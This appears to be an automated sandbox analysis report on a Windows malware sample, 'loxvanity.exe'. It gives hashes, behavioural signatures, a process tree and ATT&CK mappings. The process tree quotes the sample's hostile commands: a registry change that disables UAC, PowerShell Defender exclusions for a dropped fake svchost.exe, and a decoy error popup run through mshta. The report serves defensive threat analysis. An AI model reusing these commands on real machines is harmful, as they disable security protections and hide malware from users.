Analysis
-
max time kernel
35s -
max time network
55s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
16-04-2024 01:30
Static task
static1
Errors
General
-
Target
loxvanity.exe
-
Size
7.5MB
-
MD5
ae18d7298dbd5a2f9a1205155f9c03b6
-
SHA1
baf3d83ad8a391d36d0a0fdf3a0a510afa4ccc59
-
SHA256
88417151070ccd5906c410061a2d27faf14473607c11eecc58fa56e60f3caf4b
-
SHA512
a3988d5d1b8102bc1f074f6c4e1ada4db7bcf673fe81734b82b710c822698f55df5a4a6aaf3734f64cb6282b22eeb9a5eefce390bc1304cbcdff7ec0dbf0e2ef
-
SSDEEP
196608:Rdg6G0KaH2EGMII+QvlRXgh9OADa8k2mv899:1WEfIIDvlCiUCd899
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral1/memory/4940-77-0x000000001BDB0000-0x000000001BDBE000-memory.dmp disable_win_def -
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
svchost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ svchost.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
svchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
loxvanity.exesvchost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation loxvanity.exe Key value queried \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation svchost.exe -
Executes dropped EXE 1 IoCs
Processes:
svchost.exepid process 4940 svchost.exe -
Loads dropped DLL 1 IoCs
Processes:
svchost.exepid process 4940 svchost.exe -
Obfuscated with Agile.Net obfuscator 2 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule C:\ProgramData\svchost.exe agile_net behavioral1/memory/4940-18-0x0000000000A20000-0x0000000001126000-memory.dmp agile_net -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\989fcd0e-6abf-40ee-9e41-0c366f1c7108\AgileDotNetRT64.dll themida behavioral1/memory/4940-29-0x00007FFE68D30000-0x00007FFE698B4000-memory.dmp themida behavioral1/memory/4940-33-0x00007FFE68D30000-0x00007FFE698B4000-memory.dmp themida behavioral1/memory/4940-50-0x00007FFE68D30000-0x00007FFE698B4000-memory.dmp themida behavioral1/memory/4940-75-0x00007FFE68D30000-0x00007FFE698B4000-memory.dmp themida behavioral1/memory/4940-76-0x00007FFE68D30000-0x00007FFE698B4000-memory.dmp themida -
Processes:
svchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
svchost.exepid process 4940 svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exesvchost.exepid process 4912 powershell.exe 4912 powershell.exe 1352 powershell.exe 1352 powershell.exe 4940 svchost.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
svchost.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4940 svchost.exe Token: SeDebugPrivilege 4912 powershell.exe Token: SeDebugPrivilege 1352 powershell.exe Token: SeShutdownPrivilege 4940 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
svchost.exepid process 4940 svchost.exe -
Suspicious use of WriteProcessMemory 34 IoCs
Processes:
loxvanity.execmd.execmd.execmd.exesvchost.exedescription pid process target process PID 1816 wrote to memory of 4996 1816 loxvanity.exe cmd.exe PID 1816 wrote to memory of 4996 1816 loxvanity.exe cmd.exe PID 1816 wrote to memory of 4940 1816 loxvanity.exe svchost.exe PID 1816 wrote to memory of 4940 1816 loxvanity.exe svchost.exe PID 4996 wrote to memory of 396 4996 cmd.exe chcp.com PID 4996 wrote to memory of 396 4996 cmd.exe chcp.com PID 4996 wrote to memory of 1584 4996 cmd.exe cmd.exe PID 4996 wrote to memory of 1584 4996 cmd.exe cmd.exe PID 4996 wrote to memory of 3984 4996 cmd.exe find.exe PID 4996 wrote to memory of 3984 4996 cmd.exe find.exe PID 4996 wrote to memory of 1480 4996 cmd.exe findstr.exe PID 4996 wrote to memory of 1480 4996 cmd.exe findstr.exe PID 4996 wrote to memory of 2476 4996 cmd.exe findstr.exe PID 4996 wrote to memory of 2476 4996 cmd.exe findstr.exe PID 4996 wrote to memory of 1688 4996 cmd.exe findstr.exe PID 4996 wrote to memory of 1688 4996 cmd.exe findstr.exe PID 4996 wrote to memory of 1836 4996 cmd.exe findstr.exe PID 4996 wrote to memory of 1836 4996 cmd.exe findstr.exe PID 4996 wrote to memory of 652 4996 cmd.exe find.exe PID 4996 wrote to memory of 652 4996 cmd.exe find.exe PID 4996 wrote to memory of 4056 4996 cmd.exe cmd.exe PID 4996 wrote to memory of 4056 4996 cmd.exe cmd.exe PID 4996 wrote to memory of 1120 4996 cmd.exe cmd.exe PID 4996 wrote to memory of 1120 4996 cmd.exe cmd.exe PID 4996 wrote to memory of 1976 4996 cmd.exe cmd.exe PID 4996 wrote to memory of 1976 4996 cmd.exe cmd.exe PID 1120 wrote to memory of 5032 1120 cmd.exe mshta.exe PID 1120 wrote to memory of 5032 1120 cmd.exe mshta.exe PID 1976 wrote to memory of 2032 1976 cmd.exe reg.exe PID 1976 wrote to memory of 2032 1976 cmd.exe reg.exe PID 4940 wrote to memory of 4912 4940 svchost.exe powershell.exe PID 4940 wrote to memory of 4912 4940 svchost.exe powershell.exe PID 4940 wrote to memory of 1352 4940 svchost.exe powershell.exe PID 4940 wrote to memory of 1352 4940 svchost.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\loxvanity.exe"C:\Users\Admin\AppData\Local\Temp\loxvanity.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\z.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp.com 4373⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp3⤵
-
C:\Windows\system32\find.exefiNd3⤵
-
C:\Windows\system32\findstr.exefindstr /L /I set "C:\ProgramData\z.bat"3⤵
-
C:\Windows\system32\findstr.exefindstr /L /I goto "C:\ProgramData\z.bat"3⤵
-
C:\Windows\system32\findstr.exefindstr /L /I echo "C:\ProgramData\z.bat"3⤵
-
C:\Windows\system32\findstr.exefindstr /L /I pause "C:\ProgramData\z.bat"3⤵
-
C:\Windows\system32\find.exefINd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp3⤵
-
C:\Windows\system32\cmd.execmd.exe /c mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The instruction at 0x00000000771034FB referenced memory at 0x00000000771034FB. The required data was not placed into memory because of an I/O error status of 0x0000428. Click on OK to terminate the program', 0, 'Application Error', 0+16);close()"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The instruction at 0x00000000771034FB referenced memory at 0x00000000771034FB. The required data was not placed into memory because of an I/O error status of 0x0000428. Click on OK to terminate the program', 0, 'Application Error', 0+16);close()"4⤵
-
C:\Windows\system32\cmd.execmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
-
C:\ProgramData\svchost.exe"C:\ProgramData\svchost.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\svchost.exeFilesize
7.0MB
MD537937d01536f14247bd0891acbaf3d62
SHA1adfdbb97814c4cc30068ba86d5708e1d8dde6471
SHA2564aea68aaf95feee335f0246e51132096409a11043efdc3d57e78f0a8803eb7b8
SHA512803ad02fc353758fae35b1d1c976006328ec5e378697b37dcc7e8cab24613ec9ac0f3c794dce4a790de69ab26215df8ce5b8f963c061d528ffb80ffdcd0f45dd
-
C:\ProgramData\tmpFilesize
14B
MD5ce585c6ba32ac17652d2345118536f9c
SHA1be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
-
C:\ProgramData\z.batFilesize
21KB
MD50902aa3eede3132fdd4d51152b75e07b
SHA1b02df12e8acf84e5b156e6ad8ef9ba70c12b8498
SHA256debbc8175a46379edba8658e437e58956a2ee54c0f8da5d1b62be82b6b9a6078
SHA51288b2a2383f51f3f72a133acc4b67b47fef5062a1db4717aa3ac90df93e4c2a5c07cc2826320c8ac9bf3cca7f98f16911f8ad4c92c012c43b3a62a5fe31b77e21
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD514c4e65bf8c7c791a39fc3fe3e9b79fa
SHA1cb8e103fb6d00fe60272e39605d356d4485c8f46
SHA256bc42160231f353408b60e1f64d8f5224b82b895480f4a81fc68fcd23d6d2f8b6
SHA512025a4558a75007291cb6e26bb1f9090f5784bda6ef7dcc7e9013e8cffadae323fd7975f6242adac85981e24bac673ac791dba6d981f180ee18a0c085a38d2ab8
-
C:\Users\Admin\AppData\Local\Temp\989fcd0e-6abf-40ee-9e41-0c366f1c7108\AgileDotNetRT64.dllFilesize
4.2MB
MD505b012457488a95a05d0541e0470d392
SHA174f541d6a8365508c794ef7b4ac7c297457f9ce3
SHA2561f77a0749ac730500f203b8c4d072587923ac679e184a3859aeb855c2a2e7d8d
SHA5126d6e7b838d4425d49ac8d3738135374ef5357f0677b07cecb7afbf5feddc1997bf6dce68d48787eff8a74c4728def8880c8f01842eda35b5815fb561fa401ae6
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3vk5fie4.fbx.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/1352-70-0x000002E3715C0000-0x000002E3715D0000-memory.dmpFilesize
64KB
-
memory/1352-72-0x000002E3715C0000-0x000002E3715D0000-memory.dmpFilesize
64KB
-
memory/1352-59-0x000002E3715C0000-0x000002E3715D0000-memory.dmpFilesize
64KB
-
memory/1352-74-0x00007FFE6E060000-0x00007FFE6EB21000-memory.dmpFilesize
10.8MB
-
memory/1352-57-0x00007FFE6E060000-0x00007FFE6EB21000-memory.dmpFilesize
10.8MB
-
memory/4912-37-0x00007FFE6E060000-0x00007FFE6EB21000-memory.dmpFilesize
10.8MB
-
memory/4912-39-0x000001FBA4550000-0x000001FBA4560000-memory.dmpFilesize
64KB
-
memory/4912-40-0x000001FBA4550000-0x000001FBA4560000-memory.dmpFilesize
64KB
-
memory/4912-38-0x000001FB8C0D0000-0x000001FB8C0F2000-memory.dmpFilesize
136KB
-
memory/4912-51-0x000001FBA4550000-0x000001FBA4560000-memory.dmpFilesize
64KB
-
memory/4912-52-0x000001FBA4550000-0x000001FBA4560000-memory.dmpFilesize
64KB
-
memory/4912-55-0x00007FFE6E060000-0x00007FFE6EB21000-memory.dmpFilesize
10.8MB
-
memory/4940-31-0x00007FFE8C4D0000-0x00007FFE8C6C5000-memory.dmpFilesize
2.0MB
-
memory/4940-50-0x00007FFE68D30000-0x00007FFE698B4000-memory.dmpFilesize
11.5MB
-
memory/4940-58-0x00007FFE6E060000-0x00007FFE6EB21000-memory.dmpFilesize
10.8MB
-
memory/4940-36-0x00007FFE6C610000-0x00007FFE6C75E000-memory.dmpFilesize
1.3MB
-
memory/4940-33-0x00007FFE68D30000-0x00007FFE698B4000-memory.dmpFilesize
11.5MB
-
memory/4940-29-0x00007FFE68D30000-0x00007FFE698B4000-memory.dmpFilesize
11.5MB
-
memory/4940-71-0x00007FFE8C4D0000-0x00007FFE8C6C5000-memory.dmpFilesize
2.0MB
-
memory/4940-17-0x00007FFE6E060000-0x00007FFE6EB21000-memory.dmpFilesize
10.8MB
-
memory/4940-18-0x0000000000A20000-0x0000000001126000-memory.dmpFilesize
7.0MB
-
memory/4940-75-0x00007FFE68D30000-0x00007FFE698B4000-memory.dmpFilesize
11.5MB
-
memory/4940-76-0x00007FFE68D30000-0x00007FFE698B4000-memory.dmpFilesize
11.5MB
-
memory/4940-77-0x000000001BDB0000-0x000000001BDBE000-memory.dmpFilesize
56KB